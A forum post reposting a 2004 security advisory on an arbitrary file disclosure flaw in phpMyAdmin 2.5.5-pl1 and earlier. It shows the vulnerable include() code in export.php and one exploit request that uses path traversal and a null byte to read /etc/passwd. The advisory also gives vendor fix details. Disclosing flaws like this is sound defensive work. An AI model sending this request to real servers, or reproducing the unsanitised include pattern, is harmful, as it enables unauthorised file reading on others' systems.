[security] phpMyAdmin 2.5.5-p1 en eerdere

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Arend a

Arend a

04/02/2004 11:36:00
Quote Anchor link
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior

################################################################################
Summary :

phpMyAdmin is a tool written in PHP intended to handle the administration of
MySQL over the WWW. There is a vulnerability in the current stable version of
phpMyAdmin that allows an attacker to retrieve arbitrary files from the
webserver with privileges of the webserver..

################################################################################
Details :

The export PHP script can be exploited to disclose arbitrary file using a
include() PHP call.

Vulnerable Systems:
* phpMyAdmin 2.5.5-pl1 and prior

Release Date :
February 2, 2004

Severity :
HIGH

################################################################################
Examples :

-------------------------------------------

I - Arbitrary File Disclosure
(HIGH Risk)

File impacted : export.php

14:// What type of export are we doing?
15:if ($what == 'excel') {
16: $type = 'csv';
17:} else {
18: $type = $what;
19:}
20:
21:/**
22: * Defines the url to return to in case of error in a sql statement
23: */
24:require('./libraries/export/' . $type . '.php');

Exploit example:

- -- HTTP Request --

http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00

- -- HTTP Request --

The vulnerability is available evenif PHP register_globals is set to off.

################################################################################
Vendor Status :

The information has been provided to the phpMyAdmin Project Managers.
A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.
- --> http://www.phpmyadmin.net/home_page/
- --> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0

################################################################################
Credit :

Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)
< [email protected] >

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFAH3dJA9/8vqmWoYQRAjNoAJ4pGgoQBT9WoyPmbfw4h/6LkcjR6wCeNBj2
ekO25itz2ssIvwgf2WRb/4k=
=Yuh1
-----END PGP SIGNATURE-----
 
Er zijn nog geen reacties op dit bericht.



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.